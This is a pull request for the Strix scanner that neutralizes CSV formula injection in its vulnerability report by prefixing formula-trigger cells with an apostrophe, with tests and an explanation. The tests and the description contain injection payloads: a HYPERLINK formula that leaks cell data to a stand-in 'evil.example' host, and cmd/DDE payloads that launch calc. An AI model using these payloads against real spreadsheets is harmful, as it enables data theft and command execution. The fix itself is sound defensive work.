### PR TITLE
fix(report): neutralize CSV formula injection in vulnerabilities.csv

### DIFF
--- a/strix/report/writer.py
+++ b/strix/report/writer.py
@@ -26,8 +26,29 @@ logger = logging.getLogger(__name__)
 
 _SEVERITY_ORDER = {"critical": 0, "high": 1, "medium": 2, "low": 3, "info": 4}
 
+_CSV_FORMULA_PREFIXES = ("=", "+", "-", "@", "\t", "\r")
+
 _FENCE_RE = re.compile(r"^```([^\n`]*)\r?\n(.*?)\r?\n?```$", re.DOTALL)
 _BACKTICK_RUN = re.compile(r"`+")
+
+
+def csv_safe(value: object) -> str:
+    """Return ``value`` as a CSV cell a spreadsheet will not treat as a formula.
+
+    Excel, LibreOffice and Sheets evaluate a cell whose first character is one of
+    ``= + - @``, tab or carriage return. The :mod:`csv` module quotes CSV syntax
+    but has no notion of formula triggers, so such a value reaches the cell intact
+    and is executed on open (CWE-1236). Vulnerability titles quote text from the
+    scanned target, which is exactly the attacker-influenced input this guards
+    against.
+
+    Prefixing with an apostrophe is the standard mitigation: spreadsheets treat
+    the rest of the cell as literal text and hide the apostrophe on display.
+    """
+    text = str(value)
+    if text.startswith(_CSV_FORMULA_PREFIXES):
+        return "'" + text
+    return text
 
 
 def safe_fence(content: str) -> str:
@@ -151,11 +172,11 @@ def write_vulnerabilities(
     for report in sorted_reports:
         csv_writer.writerow(
             {
-                "id": report["id"],
-                "title": report["title"],
-                "severity": report["severity"].upper(),
-                "timestamp": report["timestamp"],
-                "file": f"vulnerabilities/{report['id']}.md",
+                "id": csv_safe(report["id"]),
+                "title": csv_safe(report["title"]),
+                "severity": csv_safe(report["severity"].upper()),
+                "timestamp": csv_safe(report["timestamp"]),
+                "file": csv_safe(f"vulnerabilities/{report['id']}.md"),
             },
         )
     atomic_write_text(csv_path, csv_buf.getvalue())

--- a/tests/test_report_writer.py
+++ b/tests/test_report_writer.py
@@ -163,6 +163,53 @@ def test_write_vulnerabilities_creates_markdown_csv_and_json(tmp_path: Path) -> 
     assert csv_rows[0]["severity"] == "CRITICAL"
 
 
+@pytest.mark.parametrize(
+    "payload",
+    [
+        '=HYPERLINK("http://evil.example/leak?d="&A1,"View")',
+        "+cmd|'/c calc'!A1",
+        "@SUM(1+1)*cmd|'/c calc'!A1",
+        "-2+3+cmd|'/c calc'!A1",
+        "\t leading tab",
+        "\r leading carriage return",
+    ],
+)
+def test_write_vulnerabilities_csv_neutralizes_formula_injection(
+    tmp_path: Path,
+    payload: str,
+) -> None:
+    # Titles quote text from the scanned target, so a finding title can begin with
+    # a spreadsheet formula trigger. csv escapes CSV syntax but not formula
+    # triggers, so the cell has to be neutralized before it is written.
+    write_vulnerabilities(tmp_path, [_sample_report(title=payload)], set())
+
+    csv_rows = list(
+        csv.DictReader((tmp_path / "vulnerabilities.csv").read_text(encoding="utf-8").splitlines()),
+    )
+    title = csv_rows[0]["title"]
+    assert title.startswith("'")
+    assert not title.startswith(("=", "+", "-", "@", "\t", "\r"))
+
+
+def test_write_vulnerabilities_csv_preserves_payload_after_guard(tmp_path: Path) -> None:
+    payload = "=1+1"
+    write_vulnerabilities(tmp_path, [_sample_report(title=payload)], set())
+
+    csv_rows = list(
+        csv.DictReader((tmp_path / "vulnerabilities.csv").read_text(encoding="utf-8").splitlines()),
+    )
+    assert csv_rows[0]["title"] == "'=1+1"  # guard prefix only, payload intact
+
+
+def test_write_vulnerabilities_csv_leaves_benign_titles_unchanged(tmp_path: Path) -> None:
+    write_vulnerabilities(tmp_path, [_sample_report(title="SQL Injection in /login")], set())
+
+    csv_rows = list(
+        csv.DictReader((tmp_path / "vulnerabilities.csv").read_text(encoding="utf-8").splitlines()),
+    )
+    assert csv_rows[0]["title"] == "SQL Injection in /login"
+
+
 def test_write_vulnerabilities_skips_already_saved_ids(tmp_path: Path) -> None:
     reports = [_sample_report(id="vuln-0001")]
     saved: set[str] = {"vuln-0001"}


### PR DESCRIPTION
Fixes #1199

## The problem

`write_vulnerabilities()` writes finding titles straight into `vulnerabilities.csv`. The `csv` module escapes CSV *syntax* (commas, quotes, newlines) but has no notion of spreadsheet **formula triggers**, so a title beginning with `=`, `+`, `-`, `@`, tab or CR reaches the cell intact and is evaluated when someone opens the file — CWE-1236.

Confirmed on `main` that nothing upstream stops it: `_validate_required_text` only checks the title is non-blank, and there's no sanitization anywhere in the report path.

Reproduced against the real `write_vulnerabilities()` before the change:

```
title cell: '=HYPERLINK("http://evil.example","x")'
guarded with apostrophe?      False
starts with formula trigger?  True
```

The input is attacker-influenced *by design*: Strix scans untrusted targets and the agent quotes target content verbatim into titles, so a scanned page's `<title>`, a parameter value, or an injected string can end up dictating a cell's literal contents. The person who opens the CSV is the operator.

Worth noting `strix/report/sarif.py` already lists `"csv injection"` among the vulnerability classes Strix *detects* — this is the same bug in its own output path.

## The change

Adds `csv_safe()` and applies it to every cell written. A value starting with a trigger is prefixed with an apostrophe — the standard mitigation, which spreadsheets render as literal text with the apostrophe hidden.

This follows the module's own precedent: `safe_fence()` already exists a few lines above and guards the markdown path against exactly this class of "LLM-authored, attacker-influenced" content. I applied the guard to all five columns rather than just `title`, so a future column can't silently reintroduce the hole.

## Verification

Against the real `write_vulnerabilities()`:

| | result |
|---|---|
| all 6 trigger chars neutralized | ✅ |
| payload preserved behind guard (`=1+1` → `'=1+1`) | ✅ |
| benign titles untouched | ✅ |
| same tests pre-fix | ❌ fail (cell starts with `=`) |
| `ruff check` / `ruff format` | clean |

One implementation note from testing: a lone `\r` in a title is translated to `\n` by `atomic_write_text` before it ever reaches the CSV, so it can't survive round-trip byte-for-byte. The guard still fires on it, which is why the test asserts the security property for the control characters and exact preservation separately on a printable payload.

## Caveat

My environment is Python 3.10 and the project requires ≥3.12, so I could not run `pytest` directly — `strix.report.writer` only needs `datetime.UTC`, so I shimmed that and exercised the real `write_vulnerabilities()` by loading the module directly. The logic and file output are genuinely verified; the suite running green under 3.12 in CI is the part I'd ask you to confirm.

---

Disclosure: found and drafted with AI assistance (Claude Code). Every result above is from running the code, not from inspection.